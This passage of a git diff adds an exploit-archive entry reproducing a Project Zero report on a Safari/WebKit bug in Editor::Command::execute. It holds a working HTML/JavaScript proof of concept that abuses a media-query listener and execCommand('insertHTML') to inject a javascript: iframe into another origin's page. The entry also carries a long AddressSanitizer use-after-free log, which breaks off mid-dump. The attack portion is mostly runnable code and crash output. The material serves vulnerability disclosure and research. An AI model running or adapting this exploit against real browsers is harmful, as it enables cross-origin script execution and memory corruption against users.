+  0x0ff21a520c20: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
+  0x0ff21a520c30: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
+  0x0ff21a520c40: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
+  0x0ff21a520c50: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
+=>0x0ff21a520c60: fa fa fa fa fa fa[fa]fa fa fa fa fa fa fa fa fa
+  0x0ff21a520c70: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
+  0x0ff21a520c80: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
+  0x0ff21a520c90: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
+  0x0ff21a520ca0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
+  0x0ff21a520cb0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
+Shadow byte legend (one shadow byte represents 8 application bytes):
+  Addressable:           00
+  Partially addressable: 01 02 03 04 05 06 07 
+  Heap left redzone:       fa
+  Heap right redzone:      fb
+  Freed heap region:       fd
+  Stack left redzone:      f1
+  Stack mid redzone:       f2
+  Stack right redzone:     f3
+  Stack partial redzone:   f4
+  Stack after return:      f5
+  Stack use after scope:   f8
+  Global redzone:          f9
+  Global init order:       f6
+  Poisoned by user:        f7
+  Container overflow:      fc
+  Array cookie:            ac
+  Intra object redzone:    bb
+  ASan internal:           fe
+  Left alloca redzone:     ca
+  Right alloca redzone:    cb
+==25524==ABORTING
+-->
\ No newline at end of file
diff --git a/platforms/multiple/webapps/42064.html b/platforms/multiple/webapps/42064.html
new file mode 100755
index 000000000..38a34d960
--- /dev/null
+++ b/platforms/multiple/webapps/42064.html
@@ -0,0 +1,238 @@
+<!--
+Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1133
+
+Here's a snippet of Editor::Command::execute used to handle |document.execCommand|.
+
+bool Editor::Command::execute(const String& parameter, Event* triggeringEvent) const
+{
+    if (!isEnabled(triggeringEvent)) {
+        // Let certain commands be executed when performed explicitly even if they are disabled.
+        if (!allowExecutionWhenDisabled())
+            return false;
+    }
+    m_frame->document()->updateLayoutIgnorePendingStylesheets();
+    return m_command->execute(*m_frame, triggeringEvent, m_source, parameter);
+}
+
+This method is invoked under an |EventQueueScope|. But |updateLayoutIgnorePendingStylesheets| invokes |MediaQueryMatcher::styleResolverChanged| that directly calls |handleEvent| not affected by |EventQueueScope|. So it may end up to fire javascript handlers(|listener| in PoC). If we replace the document in that handler, |m_command| will be executed on the new document's focused element. We can use # in URL to give a focus.
+
+Note 1: The PoC also trigger a UAF. So I recommend to test it on a release build.
+Note 2: If the PoC doesn't work, adjust sleep().
+
+Tested on Safari 10.0.3(12602.4.8).
+
+PoC:
+-->
+
+<html>
+<body>
+Click Anywhere.
+<script>
+
+function sleep(ms) {
+    let start = new Date();
+    while (new Date() - start < ms) {
+
+    }
+}
+
+window.onclick = () => {
+    window.onclick = null;
+
+    document.designMode = 'on';
+    document.execCommand('selectAll');
+
+    let f = document.body.appendChild(document.createElement('iframe'));
+    let media_list = f.contentWindow.matchMedia("(max-width: 100px)");
+
+    function listener() {
+        let a = document.createElement('a');
+        a.href = 'https://bugs.webkit.org/#quicksearch_top';
+        a.click();
+
+        sleep(1000);
+
+        window.showModalDialog(URL.createObjectURL(new Blob([`
+<script>
+let it = setInterval(() => {
+try {
+    opener.document.x;
+} catch (e) {
+    clearInterval(it);
+
+    setTimeout(() => {
+        window.close();
+    }, 2000);
+}
+}, 100);
+</scrip` + 't>'], {type: 'text/html'})));
+    }
+
+    media_list.addListener(listener);
+    document.execCommand('insertHTML', false, 'aaa<a-a></a-a><iframe src="javascript:alert(parent.location)"></iframe>');
+};
+
+</script>
+</body>
+</html>
+
+<!--
+UAF Asan Log:
+=================================================================
+==3526==ERROR: AddressSanitizer: heap-use-after-free on address 0x61700004d1d8 at pc 0x000117706e8b bp 0x7fff5349d050 sp 0x7fff5349d048
+READ of size 8 at 0x61700004d1d8 thread T0
+    #0 0x117706e8a in WebCore::RenderView::flushAccumulatedRepaintRegion() const (/Volumes/L/Develop/audits/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x2485e8a)
+    #1 0x115959230 in WebCore::Document::updateLayout() (/Volumes/L/Develop/audits/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x6d8230)
+    #2 0x11595f6fb in WebCore::Document::updateLayoutIgnorePendingStylesheets(WebCore::Document::RunPostLayoutTasks) (/Volumes/L/Develop/audits/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x6de6fb)
+    #3 0x115ae7206 in WebCore::Element::offsetLeft() (/Volumes/L/Develop/audits/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x866206)
+    #4 0x11661b82b in WebCore::jsElementOffsetLeftGetter(JSC::ExecState&, WebCore::JSElement&, JSC::ThrowScope&) (/Volumes/L/Develop/audits/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x139a82b)
+    #5 0x116609fe3 in long long WebCore::BindingCaller<WebCore::JSElement>::attribute<&(WebCore::jsElementOffsetLeftGetter(JSC::ExecState&, WebCore::JSElement&, JSC::ThrowScope&)), (WebCore::CastedThisErrorBehavior)0>(JSC::ExecState*, long long, char const*) (/Volumes/L/Develop/audits/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x1388fe3)
+    #6 0x112c20808 in JSC::PropertySlot::customGetter(JSC::ExecState*, JSC::PropertyName) const (/Volumes/L/Develop/audits/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x1588808)
+    #7 0x1129593be in llint_slow_path_get_by_id (/Volumes/L/Develop/audits/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x12c13be)
+    #8 0x1129767b6 in llint_entry (/Volumes/L/Develop/audits/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x12de7b6)
+    #9 0x11297395a in vmEntryToJavaScript (/Volumes/L/Develop/audits/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x12db95a)
+    #10 0x11262d662 in JSC::JITCode::execute(JSC::VM*, JSC::ProtoCallFrame*) (/Volumes/L/Develop/audits/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0xf95662)
+    #11 0x1125b12f8 in JSC::Interpreter::executeProgram(JSC::SourceCode const&, JSC::ExecState*, JSC::JSObject*) (/Volumes/L/Develop/audits/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0xf192f8)
+    #12 0x111d90a8c in JSC::evaluate(JSC::ExecState*, JSC::SourceCode const&, JSC::JSValue, WTF::NakedPtr<JSC::Exception>&) (/Volumes/L/Develop/audits/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x6f8a8c)
+    #13 0x111d90c8e in JSC::profiledEvaluate(JSC::ExecState*, JSC::ProfilingReason, JSC::SourceCode const&, JSC::JSValue, WTF::NakedPtr<JSC::Exception>&) (/Volumes/L/Develop/audits/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x6f8c8e)
+    #14 0x1177db273 in WebCore::JSMainThreadExecState::profiledEvaluate(JSC::ExecState*, JSC::ProfilingReason, JSC::SourceCode const&, JSC::JSValue, WTF::NakedPtr<JSC::Exception>&) (/Volumes/L/Develop/audits/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x255a273)
+    #15 0x1177dade4 in WebCore::ScriptController::evaluateInWorld(WebCore::ScriptSourceCode const&, WebCore::DOMWrapperWorld&, WebCore::ExceptionDetails*) (/Volumes/L/Develop/audits/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x2559de4)
+    #16 0x1177ee9d1 in WebCore::ScriptElement::executeClassicScript(WebCore::ScriptSourceCode const&) (/Volumes/L/Develop/audits/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x256d9d1)
+    #17 0x1177eb9ba in WebCore::ScriptElement::prepareScript(WTF::TextPosition const&, WebCore::ScriptElement::LegacyTypeSupport) (/Volumes/L/Develop/audits/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x256a9ba)
+    #18 0x115f62940 in WebCore::HTMLScriptRunner::runScript(WebCore::ScriptElement&, WTF::TextPosition const&) (/Volumes/L/Develop/audits/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xce1940)
+    #19 0x115f62685 in WebCore::HTMLScriptRunner::execute(WTF::Ref<WebCore::ScriptElement>&&, WTF::TextPosition const&) (/Volumes/L/Develop/audits/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xce1685)
+    #20 0x115e83cae in WebCore::HTMLDocumentParser::runScriptsForPausedTreeBuilder() (/Volumes/L/Develop/audits/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xc02cae)
+    #21 0x115e84392 in WebCore::HTMLDocumentParser::pumpTokenizerLoop(WebCore::HTMLDocumentParser::SynchronousMode, bool, WebCore::PumpSession&) (/Volumes/L/Develop/audits/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xc03392)
+    #22 0x115e835c4 in WebCore::HTMLDocumentParser::pumpTokenizer(WebCore::HTMLDocumentParser::SynchronousMode) (/Volumes/L/Develop/audits/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xc025c4)
+    #23 0x115e84fbd in WebCore::HTMLDocumentParser::append(WTF::RefPtr<WTF::StringImpl>&&) (/Volumes/L/Develop/audits/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xc03fbd)
+    #24 0x1158dfde1 in WebCore::DecodedDataDocumentParser::flush(WebCore::DocumentWriter&) (/Volumes/L/Develop/audits/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x65ede1)
+    #25 0x115a125b8 in WebCore::DocumentWriter::end() (/Volumes/L/Develop/audits/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x7915b8)
+    #26 0x1159d5a6e in WebCore::DocumentLoader::finishedLoading(double) (/Volumes/L/Develop/audits/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x754a6e)
+    #27 0x1154dc8c7 in WebCore::CachedResource::checkNotify() (/Volumes/L/Develop/audits/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x25b8c7)
+    #28 0x1154d623d in WebCore::CachedRawResource::finishLoading(WebCore::SharedBuffer*) (/Volumes/L/Develop/audits/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x25523d)
+    #29 0x117afd1eb in WebCore::SubresourceLoader::didFinishLoading(double) (/Volumes/L/Develop/audits/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x287c1eb)
+    #30 0x10f774825 in WebKit::WebResourceLoader::didFinishResourceLoad(double) (/Volumes/L/Develop/audits/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit+0x996825)
+    #31 0x10f777c05 in void IPC::handleMessage<Messages::WebResourceLoader::DidFinishResourceLoad, WebKit::WebResourceLoader, void (WebKit::WebResourceLoader::*)(double)>(IPC::Decoder&, WebKit::WebResourceLoader*, void (WebKit::WebResourceLoader::*)(double)) (/Volumes/L/Develop/audits/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit+0x999c05)
+    #32 0x10f7770ff in WebKit::WebResourceLoader::didReceiveWebResourceLoaderMessage(IPC::Connection&, IPC::Decoder&) (/Volumes/L/Develop/audits/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit+0x9990ff)
+    #33 0x10f0b75c9 in WebKit::NetworkProcessConnection::didReceiveMessage(IPC::Connection&, IPC::Decoder&) (/Volumes/L/Develop/audits/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit+0x2d95c9)
+    #34 0x10ee925a8 in IPC::Connection::dispatchMessage(std::__1::unique_ptr<IPC::Decoder, std::__1::default_delete<IPC::Decoder> >) (/Volumes/L/Develop/audits/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit+0xb45a8)
+    #35 0x10ee9bbf4 in IPC::Connection::dispatchOneMessage() (/Volumes/L/Develop/audits/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit+0xbdbf4)
+    #36 0x112f6c764 in WTF::RunLoop::performWork() (/Volumes/L/Develop/audits/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x18d4764)
+    #37 0x112f6ec7e in WTF::RunLoop::performWork(void*) (/Volumes/L/Develop/audits/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x18d6c7e)
+    #38 0x7fff7dcc3980 in __CFRUNLOOP_IS_CALLING_OUT_TO_A_SOURCE0_PERFORM_FUNCTION__ (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation+0xa7980)
+    #39 0x7fff7dca4a7c in __CFRunLoopDoSources0 (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation+0x88a7c)
+    #40 0x7fff7dca3f75 in __CFRunLoopRun (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation+0x87f75)
+    #41 0x7fff7dca3973 in CFRunLoopRunSpecific (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation+0x87973)
+    #42 0x7fff7d22fa5b in RunCurrentEventLoopInMode (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox+0x30a5b)
+    #43 0x7fff7d22f890 in ReceiveNextEventCommon (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox+0x30890)
+    #44 0x7fff7d22f6c5 in _BlockUntilNextEventMatchingListInModeWithFilter (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox+0x306c5)
+    #45 0x7fff7b7d55b3 in _DPSNextEvent (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit+0x475b3)
+    #46 0x7fff7bf4fd6a in -[NSApplication(NSEvent) _nextEventMatchingEventMask:untilDate:inMode:dequeue:] (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit+0x7c1d6a)
+    #47 0x7fff7b7c9f34 in -[NSApplication run] (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit+0x3bf34)
+    #48 0x7fff7b79484f in NSApplicationMain (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit+0x684f)
+    #49 0x7fff9345f8c6 in _xpc_objc_main (/usr/lib/system/libxpc.dylib+0x108c6)
+    #50 0x7fff9345e2e3 in xpc_main (/usr/lib/system/libxpc.dylib+0xf2e3)
+    #51 0x10c75db73 in main (/Volumes/L/Develop/audits/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/XPCServices/com.apple.WebKit.WebContent.xpc/Contents/MacOS/com.apple.WebKit.WebContent.Development+0x100001b73)
+    #52 0x7fff931fb254 in start (/usr/lib/system/libdyld.dylib+0x5254)
+
+0x61700004d1d8 is located 344 bytes inside of 720-byte region [0x61700004d080,0x61700004d350)
+freed by thread T0 here:
+    #0 0x10c7bdcf4 in __sanitizer_mz_free (/Applications/Xcode.app/Contents/Developer/Toolchains/XcodeDefault.xctoolchain/usr/lib/clang/8.0.0/lib/darwin/libclang_rt.asan_osx_dynamic.dylib+0x4bcf4)
+    #1 0x112fb56bf in bmalloc::Deallocator::deallocateSlowCase(void*) (/Volumes/L/Develop/audits/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x191d6bf)
+    #2 0x11599f26f in WebCore::RenderPtr<WebCore::RenderView>::clear() (/Volumes/L/Develop/audits/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x71e26f)
+    #3 0x11596212d in WebCore::RenderPtr<WebCore::RenderView>::operator=(std::nullptr_t) (/Volumes/L/Develop/audits/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x6e112d)
+    #4 0x115961ce0 in WebCore::Document::destroyRenderTree() (/Volumes/L/Develop/audits/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x6e0ce0)
+    #5 0x1159622e2 in WebCore::Document::prepareForDestruction() (/Volumes/L/Develop/audits/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x6e12e2)
+    #6 0x115cbef2a in WebCore::Frame::setView(WTF::RefPtr<WebCore::FrameView>&&) (/Volumes/L/Develop/audits/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xa3df2a)
+    #7 0x115cc1ed4 in WebCore::Frame::createView(WebCore::IntSize const&, WebCore::Color const&, bool, WebCore::IntSize const&, WebCore::IntRect const&, bool, WebCore::ScrollbarMode, bool, WebCore::ScrollbarMode, bool) (/Volumes/L/Develop/audits/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xa40ed4)
+    #8 0x10f40a85b in WebKit::WebFrameLoaderClient::transitionToCommittedForNewPage() (/Volumes/L/Develop/audits/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit+0x62c85b)
+    #9 0x115cd84bf in WebCore::FrameLoader::transitionToCommitted(WebCore::CachedPage*) (/Volumes/L/Develop/audits/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xa574bf)
+    #10 0x115cd7593 in WebCore::FrameLoader::commitProvisionalLoad() (/Volumes/L/Develop/audits/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xa56593)
+    #11 0x1159d59cc in WebCore::DocumentLoader::finishedLoading(double) (/Volumes/L/Develop/audits/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x7549cc)
+    #12 0x1159ddc2e in WebCore::DocumentLoader::maybeLoadEmpty() (/Volumes/L/Develop/audits/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x75cc2e)
+    #13 0x1159de008 in WebCore::DocumentLoader::startLoadingMainResource() (/Volumes/L/Develop/audits/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x75d008)
+    #14 0x115cdb9f1 in WebCore::FrameLoader::continueLoadAfterWillSubmitForm() (/Volumes/L/Develop/audits/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xa5a9f1)
+    #15 0x115cd5433 in WebCore::FrameLoader::continueLoadAfterNavigationPolicy(WebCore::ResourceRequest const&, WebCore::FormState*, bool, WebCore::AllowNavigationToInvalidURL) (/Volumes/L/Develop/audits/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xa54433)
+    #16 0x117283965 in std::__1::function<void (WebCore::ResourceRequest const&, WebCore::FormState*, bool)>::operator()(WebCore::ResourceRequest const&, WebCore::FormState*, bool) const (/Volumes/L/Develop/audits/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x2002965)
+    #17 0x1172837bf in WebCore::PolicyCallback::call(bool) (/Volumes/L/Develop/audits/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x20027bf)
+    #18 0x11728511a in WebCore::PolicyChecker::continueAfterNavigationPolicy(WebCore::PolicyAction) (/Volumes/L/Develop/audits/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x200411a)
+    #19 0x10f3f49ee in std::__1::function<void (WebCore::PolicyAction)>::operator()(WebCore::PolicyAction) const (/Volumes/L/Develop/audits/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit+0x6169ee)
+    #20 0x10f3f4846 in WebKit::WebFrame::didReceivePolicyDecision(unsigned long long, WebCore::PolicyAction, unsigned long long, WebKit::DownloadID) (/Volumes/L/Develop/audits/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit+0x616846)
+    #21 0x10f40494d in WebKit::WebFrameLoaderClient::dispatchDecidePolicyForNavigationAction(WebCore::NavigationAction const&, WebCore::ResourceRequest const&, WebCore::FormState*, std::__1::function<void (WebCore::PolicyAction)>) (/Volumes/L/Develop/audits/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit+0x62694d)
+    #22 0x117284bb9 in WebCore::PolicyChecker::checkNavigationPolicy(WebCore::ResourceRequest const&, bool, WebCore::DocumentLoader*, WebCore::FormState*, std::__1::function<void (WebCore::ResourceRequest const&, WebCore::FormState*, bool)>) (/Volumes/L/Develop/audits/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x2003bb9)
+    #23 0x115cd413c in WebCore::FrameLoader::loadWithDocumentLoader(WebCore::DocumentLoader*, WebCore::FrameLoadType, WebCore::FormState*, WebCore::AllowNavigationToInvalidURL) (/Volumes/L/Develop/audits/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xa5313c)
+    #24 0x115cd2e76 in WebCore::FrameLoader::loadWithNavigationAction(WebCore::ResourceRequest const&, WebCore::NavigationAction const&, WebCore::LockHistory, WebCore::FrameLoadType, WebCore::FormState*, WebCore::AllowNavigationToInvalidURL) (/Volumes/L/Develop/audits/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xa51e76)
+    #25 0x115ccf7a1 in WebCore::FrameLoader::loadURL(WebCore::FrameLoadRequest const&, WTF::String const&, WebCore::FrameLoadType, WebCore::Event*, WebCore::FormState*) (/Volumes/L/Develop/audits/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xa4e7a1)
+    #26 0x115cc8af0 in WebCore::FrameLoader::loadFrameRequest(WebCore::FrameLoadRequest const&, WebCore::Event*, WebCore::FormState*) (/Volumes/L/Develop/audits/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xa47af0)
+    #27 0x115cc8079 in WebCore::FrameLoader::urlSelected(WebCore::FrameLoadRequest const&, WebCore::Event*) (/Volumes/L/Develop/audits/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xa47079)
+    #28 0x115cc82fa in WebCore::FrameLoader::urlSelected(WebCore::URL const&, WTF::String const&, WebCore::Event*, WebCore::LockHistory, WebCore::LockBackForwardList, WebCore::ShouldSendReferrer, WebCore::ShouldOpenExternalURLsPolicy, std::optional<WebCore::NewFrameOpenerPolicy>, WTF::AtomicString const&) (/Volumes/L/Develop/audits/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xa472fa)
+    #29 0x115e39f39 in WebCore::HTMLAnchorElement::handleClick(WebCore::Event&) (/Volumes/L/Develop/audits/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xbb8f39)
+
+previously allocated by thread T0 here:
+    #0 0x10c7bd790 in __sanitizer_mz_malloc (/Applications/Xcode.app/Contents/Developer/Toolchains/XcodeDefault.xctoolchain/usr/lib/clang/8.0.0/lib/darwin/libclang_rt.asan_osx_dynamic.dylib+0x4b790)
+    #1 0x7fff9337d2d9 in malloc_zone_malloc (/usr/lib/system/libsystem_malloc.dylib+0x22d9)
+    #2 0x112fbf184 in bmalloc::DebugHeap::malloc(unsigned long) (/Volumes/L/Develop/audits/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x1927184)
+    #3 0x112fb447b in bmalloc::Allocator::allocateSlowCase(unsigned long) (/Volumes/L/Develop/audits/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x191c47b)
+    #4 0x112f4d245 in bmalloc::Allocator::allocate(unsigned long) (/Volumes/L/Develop/audits/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x18b5245)
+    #5 0x112f4c528 in WTF::fastMalloc(unsigned long) (/Volumes/L/Develop/audits/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x18b4528)
+    #6 0x11596140d in WebCore::RenderPtr<WebCore::RenderView> WebCore::createRenderer<WebCore::RenderView, WebCore::Document&, WebCore::RenderStyle>(WebCore::Document&&&, WebCore::RenderStyle&&) (/Volumes/L/Develop/audits/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x6e040d)
+    #7 0x1159611ed in WebCore::Document::createRenderTree() (/Volumes/L/Develop/audits/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x6e01ed)
+    #8 0x115961519 in WebCore::Document::didBecomeCurrentDocumentInFrame() (/Volumes/L/Develop/audits/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x6e0519)
+    #9 0x115cbf910 in WebCore::Frame::setDocument(WTF::RefPtr<WebCore::Document>&&) (/Volumes/L/Develop/audits/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xa3e910)
+    #10 0x115a11f94 in WebCore::DocumentWriter::begin(WebCore::URL const&, bool, WebCore::Document*) (/Volumes/L/Develop/audits/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x790f94)
+    #11 0x1159d6365 in WebCore::DocumentLoader::commitData(char const*, unsigned long) (/Volumes/L/Develop/audits/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x755365)
+    #12 0x10f406052 in WebKit::WebFrameLoaderClient::committedLoad(WebCore::DocumentLoader*, char const*, int) (/Volumes/L/Develop/audits/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit+0x628052)
+    #13 0x1159d995c in WebCore::DocumentLoader::commitLoad(char const*, int) (/Volumes/L/Develop/audits/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x75895c)
+    #14 0x1154d5eff in WebCore::CachedRawResource::notifyClientsDataWasReceived(char const*, unsigned int) (/Volumes/L/Develop/audits/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x254eff)
+    #15 0x1154d5cf5 in WebCore::CachedRawResource::addDataBuffer(WebCore::SharedBuffer&) (/Volumes/L/Develop/audits/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x254cf5)
+    #16 0x117afe96c in WebCore::SubresourceLoader::didReceiveDataOrBuffer(char const*, int, WTF::RefPtr<WebCore::SharedBuffer>&&, long long, WebCore::DataPayloadType) (/Volumes/L/Develop/audits/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x287d96c)
+    #17 0x117afe695 in WebCore::SubresourceLoader::didReceiveData(char const*, unsigned int, long long, WebCore::DataPayloadType) (/Volumes/L/Develop/audits/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x287d695)
+    #18 0x10f7740b5 in WebKit::WebResourceLoader::didReceiveData(IPC::DataReference const&, long long) (/Volumes/L/Develop/audits/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit+0x9960b5)
+    #19 0x10f777ab4 in void IPC::handleMessage<Messages::WebResourceLoader::DidReceiveData, WebKit::WebResourceLoader, void (WebKit::WebResourceLoader::*)(IPC::DataReference const&, long long)>(IPC::Decoder&, WebKit::WebResourceLoader*, void (WebKit::WebResourceLoader::*)(IPC::DataReference const&, long long)) (/Volumes/L/Develop/audits/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit+0x999ab4)
+    #20 0x10f777043 in WebKit::WebResourceLoader::didReceiveWebResourceLoaderMessage(IPC::Connection&, IPC::Decoder&) (/Volumes/L/Develop/audits/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit+0x999043)
+    #21 0x10f0b75c9 in WebKit::NetworkProcessConnection::didReceiveMessage(IPC::Connection&, IPC::Decoder&) (/Volumes/L/Develop/audits/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit+0x2d95c9)
+    #22 0x10ee925a8 in IPC::Connection::dispatchMessage(std::__1::unique_ptr<IPC::Decoder, std::__1::default_delete<IPC::Decoder> >) (/Volumes/L/Develop/audits/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit+0xb45a8)
+    #23 0x10ee9bbf4 in IPC::Connection::dispatchOneMessage() (/Volumes/L/Develop/audits/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit+0xbdbf4)
+    #24 0x112f6c764 in WTF::RunLoop::performWork() (/Volumes/L/Develop/audits/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x18d4764)
+    #25 0x112f6ec7e in WTF::RunLoop::performWork(void*) (/Volumes/L/Develop/audits/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x18d6c7e)
+    #26 0x7fff7dcc3980 in __CFRUNLOOP_IS_CALLING_OUT_TO_A_SOURCE0_PERFORM_FUNCTION__ (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation+0xa7980)
+    #27 0x7fff7dca4a7c in __CFRunLoopDoSources0 (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation+0x88a7c)
+    #28 0x7fff7dca3f75 in __CFRunLoopRun (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation+0x87f75)
+    #29 0x7fff7dca3973 in CFRunLoopRunSpecific (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation+0x87973)
+
+SUMMARY: AddressSanitizer: heap-use-after-free (/Volumes/L/Develop/audits/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x2485e8a) in WebCore::RenderView::flushAccumulatedRepaintRegion() const
+Shadow bytes around the buggy address:
+  0x1c2e000099e0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
+  0x1c2e000099f0: fd fd fa fa fa fa fa fa fa fa fa fa fa fa fa fa
+  0x1c2e00009a00: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
